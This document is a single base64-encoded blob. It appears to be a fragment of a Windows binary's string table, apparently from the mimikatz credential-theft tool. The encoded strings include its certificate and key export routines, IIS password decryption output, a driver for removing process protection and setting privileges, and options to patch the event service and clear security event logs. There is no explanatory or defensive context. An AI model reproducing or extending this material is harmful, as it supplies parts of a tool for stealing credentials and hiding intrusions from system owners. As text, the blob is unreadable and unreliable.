AbQBfAGMAcgB5AHAAdABvAF8AZwBlAG4AZQByAGEAdABlAEYAaQBsAGUATgBhAG0AZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABkAGUAcgAAAAkAUAB1AGIAbABpAGMAIABlAHgAcABvAHIAdAAgACAAOgAgACUAcwAgAC0AIAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGUAeABwAG8AcgB0AEMAZQByAHQAIAA7ACAAQwByAGUAYQB0AGUARgBpAGwAZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBlAHgAcABvAHIAdABDAGUAcgB0ACAAOwAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBnAGUAbgBlAHIAYQB0AGUARgBpAGwAZQBOAGEAbQBlACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAcABmAHgAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AZQB4AHAAbwByAHQAQwBlAHIAdAAgADsAIABFAHgAcABvAHIAdAAgAC8AIABDAHIAZQBhAHQAZQBGAGkAbABlACAAKAAwAHgAJQAwADgAeAApAAoAAAAAACUAcwBfACUAcwBfACUAdQBfACUAcwAuACUAcwAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGwAXwBzAGMAXwBwAHIAbwB2AHQAeQBwAGUAZgByAG8AbQBuAGEAbQBlACAAOwAgAEMAcgB5AHAAdABFAG4AdQBtAFAAcgBvAHYAaQBkAGUAcgBzACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABTAEMAYQByAGQAJABBAGwAbABSAGUAYQBkAGUAcgBzAAAAAAAAAAAAUwBtAGEAcgB0AEMAYQByAGQAIAByAGUAYQBkAGUAcgBzADoACgAAAAoAIAAqACAAJQBzAAoAAAAgACAAIAAgAEEAVABSACAAIAA6ACAAAAAgACAAIAAgAE0AbwBkAGUAbAA6ACAAJQBzAAoAAAAAACAAIAAgACAAQwBTAFAAIAAgADoAIAAlAHMACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGwAXwBzAGMAIAA7ACAAUwBDAGEAcgBkAEcAZQB0AEMAYQByAGQAVAB5AHAAZQBQAHIAbwB2AGkAZABlAHIATgBhAG0AZQA6ACAAMAB4ACUAMAA4AHgACgAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGwAXwBzAGMAIAA7ACAAUwBDAGEAcgBkAEwAaQBzAHQAQwBhAHIAZABzADoAIAAwAHgAJQAwADgAeAAKAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBsAF8AcwBjACAAOwAgAFMAQwBhAHIAZABHAGUAdABBAHQAdAByAGkAYgA6ACAAMAB4ACUAMAA4AHgACgAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AbABfAHMAYwAgADsAIABTAEMAYQByAGQAQwBvAG4AbgBlAGMAdAA6ACAAMAB4ACUAMAA4AHgACgAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGwAXwBzAGMAIAA7ACAAUwBDAGEAcgBkAEwAaQBzAHQAUgBlAGEAZABlAHIAcwA6ACAAMAB4ACUAMAA4AHgACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBsAF8AcwBjACAAOwAgAFMAQwBhAHIAZABFAHMAdABhAGIAbABpAHMAaABDAG8AbgB0AGUAeAB0ADoAIAAwAHgAJQAwADgAeAAKAAAAAAAAAE4AVABMAE0AOgAgAAAAAABEAEMAQwAxADoAIAAAAAAARABDAEMAMgA6ACAAAAAAAEwATQAgACAAOgAgAAAAAABNAEQANQAgADoAIAAAAAAAUwBIAEEAMQA6ACAAAAAAAFMASABBADIAOgAgAAAAAABbACUAMAA0AHgALwAlAHgAXQAgACUAcwAKAAAAIAAgAAAAAAAAAAAAUAByAG8AdgBpAGQAZQByACAAaQBuAGYAbwA6AAoAAAAJAEsAZQB5ACAAQwBvAG4AdABhAGkAbgBlAHIAIAAgADoAIAAlAHMACgAAAAAAAAAJAFAAcgBvAHYAaQBkAGUAcgAgACAAIAAgACAAIAAgADoAIAAlAHMACgAAAAAAAAAJAFAAcgBvAHYAaQBkAGUAcgAgAHQAeQBwAGUAIAAgADoAIAAlAHMAIAAoACUAdQApAAoAAAAAAAkARgBsAGEAZwBzACAAIAAgACAAIAAgACAAIAAgACAAOgAgACUAMAA4AHgACgAAAAkAUABhAHIAYQBtACAAKAB0AG8AZABvACkAIAAgACAAOgAgACUAMAA4AHgAIAAvACAAJQAwADgAeAAKAAAAAAAKACoAIABGAGkAbABlADoAIAAnACUAcwAnAAoAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAHMAeQBzAHQAZQBtACAAOwAgAEkAbgBwAHUAdAAgAE0AaQBjAHIAbwBzAG8AZgB0ACAAQwByAHkAcAB0AG8AIABDAGUAcgB0AGkAZgBpAGMAYQB0AGUAIABmAGkAbABlACAAbgBlAGUAZABlAGQAIAAoAC8AZgBpAGwAZQA6AGYAaQBsAGUAbgBhAG0AZQB8AGQAaQByAGUAYwB0AG8AcgB5ACkACgAAAGMAcgBsAAAAYwB0AGwAAABrAGUAeQBpAGQAAAAAAAAARABhAHQAYQA6ACAAAAAAACUAcwAuACUAcwAAAAAAAABTAGEAdgBlAGQAIAB0AG8AIABmAGkAbABlADoAIAAlAHMACgAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AZgBpAGwAZQBfAHIAYQB3AEQAYQB0AGEAIAA7ACAAawB1AGwAbABfAG0AXwBmAGkAbABlAF8AdwByAGkAdABlAEQAYQB0AGEAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AYwBfAHMAYwBfAGEAdQB0AGgAXwBxAHUAaQBjAGsARQBuAGMAbwBkAGUAIAA7ACAAQwByAHkAcAB0AEUAbgBjAG8AZABlAE8AYgBqAGUAYwB0ACAAKABkAGEAdABhACkAIAAoADAAeAAlADAAOAB4ACkACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGMAXwBzAGMAXwBhAHUAdABoAF8AcQB1AGkAYwBrAEUAbgBjAG8AZABlACAAOwAgAEMAcgB5AHAAdABFAG4AYwBvAGQAZQBPAGIAagBlAGMAdAAgACgAaQBuAGkAdAApACAAKAAwAHgAJQAwADgAeAApAAoAAAAAADEuMy42LjEuNC4xLjMxMS4yMC4yLjMAADIuNS4yOS4xNwAAAAAAAAAyLjUuMjkuMTUAAAAAAAAAMi41LjI5LjM3AAAAAAAAADIuNS40LjMAMi41LjQuMTAAAAAAAAAAADIuNS40LjYARgBSAAAAAABMAE8AQwBBAEwAXwBNAEEAQwBIAEkATgBFAAAAAAAAAGMAYQBzAHQAbwByAGUAAABjAGEAbgBhAG0AZQAAAAAAdQBwAG4AAABDAEEAIABzAHQAbwByAGUAIAAgACAAIAAgACAAIAA6ACAAJQBzAAoAAAAAAAAAAABDAEEAIABuAGEAbQBlACAAIAAgACAAIAAgACAAIAA6ACAAJQBzAAoAAAAAAAAAAABDAEEAIAB2AGEAbABpAGQAaQB0AHkAIAAgACAAIAA6ACAAAAAAAAAAQwBlAHIAdABpAGYAaQBjAGEAdABlACAAVQBQAE4AOgAgACUAcwAKAAAAAAAAAAAAMS4zLjYuMS41LjUuNy4zLjIAAAAAAAAAMS4zLjYuMS40LjEuMzExLjIwLjIuMgAASwBlAHkAIABjAG8AbgB0AGEAaQBuAGUAcgAgACAAOgAgACUAcwAKAAAAAAAAAAAASwBlAHkAIABwAHIAbwB2AGkAZABlAHIAIAAgACAAOgAgACUAcwAKAAAAAAAAAAAAUAByAGkAdgBhAHQAZQAgAEUAeABwAG8AcgB0ACAAOgAgACUAcwAgAC0AIAAlAHMACgAAAAAAAAAAAAAAAAAAAFAAcgBpAHYAYQB0AGUAIABTAHQAbwByAGUAIAAgADoAIABDAEUAUgBUAF8AUwBZAFMAVABFAE0AXwBTAFQATwBSAEUAXwBDAFUAUgBSAEUATgBUAF8AVQBTAEUAUgAvAE0AeQAgAC0AIAAlAHMACgAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGMAXwBzAGMAXwBhAHUAdABoACAAOwAgAEMAcgB5AHAAdABTAGkAZwBuAEEAbgBkAEUAbgBjAG8AZABlAEMAZQByAHQAaQBmAGkAYwBhAHQAZQAgACgAZABhAHQAYQApACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBjAF8AcwBjAF8AYQB1AHQAaAAgADsAIABDAHIAeQBwAHQAUwBpAGcAbgBBAG4AZABFAG4AYwBvAGQAZQBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAIAAoAGkAbgBpAHQAKQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AYwBfAHMAYwBfAGEAdQB0AGgAIAA7ACAAQwByAHkAcAB0AEUAeABwAG8AcgB0AFAAdQBiAGwAaQBjAEsAZQB5AEkAbgBmAG8AIAAoAGQAYQB0AGEAKQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGMAXwBzAGMAXwBhAHUAdABoACAAOwAgAEMAcgB5AHAAdABFAHgAcABvAHIAdABQAHUAYgBsAGkAYwBLAGUAeQBJAG4AZgBvACAAKABpAG4AaQB0ACkAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBjAF8AcwBjAF8AYQB1AHQAaAAgADsAIABDAHIAeQBwAHQARwBlAG4ASwBlAHkAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AYwBfAHMAYwBfAGEAdQB0AGgAIAA7ACAAVQBuAGEAYgBsAGUAIAB0AG8AIABkAGUAbABlAHQAZQAgAHQAZQBtAHAAIABrAGUAeQBzAGUAdAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AYwBfAHMAYwBfAGEAdQB0AGgAIAA7ACAAQwByAHkAcAB0AEEAYwBxAHUAaQByAGUAQwBvAG4AdABlAHgAdAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBjAF8AcwBjAF8AYQB1AHQAaAAgADsAIABDAHIAeQBwAHQAQQBjAHEAdQBpAHIAZQBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAUAByAGkAdgBhAHQAZQBLAGUAeQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AYwBfAHMAYwBfAGEAdQB0AGgAIAA7ACAAQwBlAHIAdABGAGkAbgBkAEMAZQByAHQAaQBmAGkAYwBhAHQAZQBJAG4AUwB0AG8AcgBlACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AYwBfAHMAYwBfAGEAdQB0AGgAIAA7ACAAQwBlAHIAdABPAHAAZQBuAFMAdABvAHIAZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGMAXwBzAGMAXwBhAHUAdABoACAAOwAgAC8AdQBwAG4AOgB1AHMAZQByAEAAZABvAG0AYQBpAG4ALgBsAG8AYwBhAGwAIABuAGUAZQBkAGUAZAAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AYwBfAHMAYwBfAGEAdQB0AGgAIAA7ACAALwBjAGEAbgBhAG0AZQA6AEMAQQAtAEsASQBXAEkAIABuAGUAZQBkAGUAZAAKAAAAcgBzAGEAZQBuAGgALgBkAGwAbAAAAAAATABvAGMAYQBsACAAQwByAHkAcAB0AG8AQQBQAEkAIABwAGEAdABjAGgAZQBkAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGMAcgB5AHAAdABvAF8AcABfAGM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AbwB0ACAAcwB1AHAAcABvAHIAdABlAGQAIAAoACUAcwApAAoAAABsAGkAdgBlAAAAAAAAAAAAIAAgAHwAIABMAGkAdgBlACAASwBlAHkAIAAgADoAIAAlAHMAIAAtACAAJQBzACAAOgAgAAAAAAAgACAAfAAgAFAAVgBLACAAZgBpAGwAZQAgACAAOgAgACUAcwAgAC0AIAAnACUAcwAnACAAOgAgAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGkAaQBzAF8AYQBwAHAAaABvAHMAdABfAHAAcgBvAHYAaQBkAGUAcgBfAGQAZQBjAHIAeQBwAHQAIAA7ACAAQwByAHkAcAB0AEkAbQBwAG8AcgB0AEsAZQB5ACAAKABSAFMAQQApACAAKAAwAHgAJQAwADgAeAApAAoAAAAAACAAIAB8ACAAUABhAHMAcwB3AG8AcgBkACAAIAA6ACAAJQBzAAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGkAaQBzAF8AYQBwAHAAaABvAHMAdABfAHAAcgBvAHYAaQBkAGUAcgBfAGQAZQBjAHIAeQBwAHQAIAA7ACAAQwByAHkAcAB0AEQAZQBjAHIAeQBwAHQAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGkAaQBzAF8AYQBwAHAAaABvAHMAdABfAHAAcgBvAHYAaQBkAGUAcgBfAGQAZQBjAHIAeQBwAHQAIAA7ACAAQwByAHkAcAB0AEkAbQBwAG8AcgB0AEsAZQB5ACAAKABzAGUAcwBzAGkAbwBuACkAIAAoADAAeAAlADAAOAB4ACkACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBpAGkAcwBfAGEAcABwAGgAbwBzAHQAXwBwAHIAbwB2AGkAZABlAHIAXwBkAGUAYwByAHkAcAB0ACAAOwAgAEMAcgB5AHAAdABBAGMAcQB1AGkAcgBlAEMAbwBuAHQAZQB4AHQAIAAoADAAeAAlADAAOAB4ACkACgAAACsAAAAAAAAAAAAAAEkAbgBzAHQAYQBsAGwAIABhAG4AZAAvAG8AcgAgAHMAdABhAHIAdAAgAG0AaQBtAGkAawBhAHQAegAgAGQ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AXwBhAGQAZABfAG0AaQBtAGkAZAByAHYAIAA7ACAAawB1AGgAbABfAG0AXwBrAGUAcgBuAGUAbABfAGEAZABkAFcAbwByAGwAZABUAG8ATQBpAG0AaQBrAGEAdAB6ACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAG4AZQBsAF8AYQBkAGQAXwBtAGkAbQBpAGQAcgB2ACAAOwAgAEMAcgBlAGEAdABlAFMAZQByAHYAaQBjAGUAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAbgBlAGwAXwBhAGQAZABfAG0AaQBtAGkAZAByAHYAIAA7ACAAawB1AGwAbABfAG0AXwBmAGkAbABlAF8AaQBzAEYAaQBsAGUARQB4AGkAcwB0ACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAbgBlAGwAXwBhAGQAZABfAG0AaQBtAGkAZAByAHYAIAA7ACAAawB1AGwAbABfAG0AXwBmAGkAbABlAF8AZwBlAHQAQQBiAHMAbwBsAHUAdABlAFAAYQB0AGgATwBmACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAG4AZQBsAF8AYQBkAGQAXwBtAGkAbQBpAGQAcgB2ACAAOwAgAE8AcABlAG4AUwBlAHIAdgBpAGMAZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAWwArAF0AIABtAGkAbQBpAGsAYQB0AHoAIABkAHIAaQB2AGUAcgAgAHMAdABhAHIAdABlAGQACgAAAAAAAAAAAFsAKgBdACAAbQBpAG0AaQBrAGEAdAB6ACAAZAByAGkAdgBlAHIAIABhAGwAcgBlAGEAZAB5ACAAcwB0AGEAcgB0AGUAZAAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBuAGUAbABfAGEAZABkAF8AbQBpAG0AaQBkAHIAdgAgADsAIABTAHQAYQByAHQAUwBlAHIAdgBpAGMAZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAG4AZQBsAF8AYQBkAGQAXwBtAGkAbQBpAGQAcgB2ACAAOwAgAE8AcABlAG4AUwBDAE0AYQBuAGEAZwBlAHIAKABjAHIAZQBhAHQAZQApACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAWwArAF0AI